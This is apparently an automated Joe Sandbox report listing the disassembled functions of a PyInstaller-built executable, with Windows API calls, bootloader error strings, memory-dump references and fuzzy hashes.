                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5D17D72A0C74186EF209B259A413AD37A4FB65798F181235FE4DA7B9ACF38E494C700
                                                                                                                                                                                                                                                        Function 00007FF65E282C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF65E283706,?,00007FF65E283804), ref: 00007FF65E282C9E
                                                                                                                                                                                                                                                        • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF65E283706,?,00007FF65E283804), ref: 00007FF65E282D63
                                                                                                                                                                                                                                                        • MessageBoxW.USER32 ref: 00007FF65E282D99
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                                        • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                        • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                                        • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                                        • Instruction ID: 361a5522263310ef7fac04a396d2ac78685c312a5983972802cb667b00db5cf9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E831C322B08B4142EA209B25AA106AA7692BF98788F450136FF4DE375DDF3CD546C700
                                                                                                                                                                                                                                                        Function 00007FF65E28DCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF65E28DF7A,?,?,?,00007FF65E28DC6C,?,?,?,00007FF65E28D869), ref: 00007FF65E28DD4D
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF65E28DF7A,?,?,?,00007FF65E28DC6C,?,?,?,00007FF65E28D869), ref: 00007FF65E28DD5B
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF65E28DF7A,?,?,?,00007FF65E28DC6C,?,?,?,00007FF65E28D869), ref: 00007FF65E28DD85
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF65E28DF7A,?,?,?,00007FF65E28DC6C,?,?,?,00007FF65E28D869), ref: 00007FF65E28DDF3
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF65E28DF7A,?,?,?,00007FF65E28DC6C,?,?,?,00007FF65E28D869), ref: 00007FF65E28DDFF
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                                        • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                        • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                                        • Instruction ID: 5e0411608db28eb34008d5227815efb131a7f6d658f1c8286969918db502fbd0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9931AF62B1E74291EE129B12AB105B53398FF68BA4F5D4535FD1DA7388EF7CE4488210
                                                                                                                                                                                                                                                        Function 00007FF65E286360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                        • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                        • Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                                        • Instruction ID: 2ff8d0a668d60eb5aca531fad8723a08db9fd662d9ccfdace69f2d30cebf22c5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F417C21A1C78691EE25DB20E7151E97361FB64344F884132FA5DA369EEF7CE509C740
                                                                                                                                                                                                                                                        Function 00007FF65E282A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF65E28351A,?,00000000,00007FF65E283F23), ref: 00007FF65E282AA0
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                        • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                                        • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                                        • Instruction ID: 64df3a915caa56ab54e70bf6329338c19b10d508852b190bc0c89b2d005a8abc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17218132A18B8192EB209B51BA817E677A4FB98784F480136FE8DE365DDF7CD245C640
                                                                                                                                                                                                                                                        Function 00007FF65E29B150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                                                        • Opcode ID: 12f476f87c8743e70c8b210e20a22f1b01636e2fed05d2f1e0a082253e023e8e
                                                                                                                                                                                                                                                        • Instruction ID: 8ba9243395dd7399c49dc2cae8b66a81e664d9c1f413825862ceb3e75f551e33
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12f476f87c8743e70c8b210e20a22f1b01636e2fed05d2f1e0a082253e023e8e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20212F20E0C25641FE585321975513D72575F647F0F1C6734F93EE66DEDD6CA8808301
                                                                                                                                                                                                                                                        Function 00007FF65E2A7D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                        • String ID: CONOUT$
                                                                                                                                                                                                                                                        • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                        • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                                        • Instruction ID: 95ac61a8d31e293162db053720fe7bb8143320024619a683ad34350a0d7f533d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA119321B18B4586EB508B12EB5432977A5FBA8BE4F080234FA5DD7798DFBCD814C744
                                                                                                                                                                                                                                                        Function 00007FF65E288ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF65E283FB1), ref: 00007FF65E288EFD
                                                                                                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF65E283FB1), ref: 00007FF65E288F5A
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E289390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF65E2845F4,00000000,00007FF65E281985), ref: 00007FF65E2893C9
                                                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF65E283FB1), ref: 00007FF65E288FE5
                                                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF65E283FB1), ref: 00007FF65E289044
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF65E283FB1), ref: 00007FF65E289055
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF65E283FB1), ref: 00007FF65E28906A
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3462794448-0
                                                                                                                                                                                                                                                        • Opcode ID: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                                                        • Instruction ID: 973bcfdb35f340b80f64c2c29a24bcb72850a35be5c020b554cd5b1b64faff3f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D417F62A1D78281EE309B12A7402AA73A4EBA5B84F481135EF4DA778DDE7DE540C700
                                                                                                                                                                                                                                                        Function 00007FF65E29B2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF65E294F11,?,?,?,?,00007FF65E29A48A,?,?,?,?,00007FF65E29718F), ref: 00007FF65E29B2D7
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF65E294F11,?,?,?,?,00007FF65E29A48A,?,?,?,?,00007FF65E29718F), ref: 00007FF65E29B30D
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF65E294F11,?,?,?,?,00007FF65E29A48A,?,?,?,?,00007FF65E29718F), ref: 00007FF65E29B33A
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF65E294F11,?,?,?,?,00007FF65E29A48A,?,?,?,?,00007FF65E29718F), ref: 00007FF65E29B34B
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF65E294F11,?,?,?,?,00007FF65E29A48A,?,?,?,?,00007FF65E29718F), ref: 00007FF65E29B35C
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF65E294F11,?,?,?,?,00007FF65E29A48A,?,?,?,?,00007FF65E29718F), ref: 00007FF65E29B377
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                                                        • Opcode ID: 341ed06667cf8b6c5416a7ef0c6dfdccbf195f5bc763a811adde1679d5f4f530
                                                                                                                                                                                                                                                        • Instruction ID: b7dd64ba46dfb9150e5cf65b32972216f9fc37ddd59981020058c92124635e2b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 341ed06667cf8b6c5416a7ef0c6dfdccbf195f5bc763a811adde1679d5f4f530
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17111D20E0C65282FE549721975117D72879F647F0F1CA734F92EF6ADEDE6CA4818305
                                                                                                                                                                                                                                                        Function 00007FF65E282910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF65E281B6A), ref: 00007FF65E28295E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                        • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                                        • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                                        • Instruction ID: 08d921fd8ca82fb7d257db1ffe627f386c87c300cf43c8016c2337072c8c204a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1231E222B18B8152EB209761AB416E67395BF987D4F480132FE8DE379DEF7CD146C600
                                                                                                                                                                                                                                                        Function 00007FF65E282390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                        • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                        • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                        • Opcode ID: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                                        • Instruction ID: a921d9a41c6db5c259e085242a2c4c0bb027d76861353537b596f300d2da5beb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72315D62A19A8289EF209B21EA552F97360FF98788F481135FA4ED7B4DDF7CD144C700
                                                                                                                                                                                                                                                        Function 00007FF65E282B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF65E28918F,?,00007FF65E283C55), ref: 00007FF65E282BA0
                                                                                                                                                                                                                                                        • MessageBoxW.USER32 ref: 00007FF65E282C2A
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                                        • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                                        • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                                        • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                                        • Instruction ID: 1ff86e343eca97bf9b781412ad167cf3849510702a6da84d5704b2672069b8c9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6421DE62B08B4182EB109B24FA857EA77A5FB98780F480136FE8DE3659DF3CD245C740
                                                                                                                                                                                                                                                        Function 00007FF65E282710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF65E281B99), ref: 00007FF65E282760
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
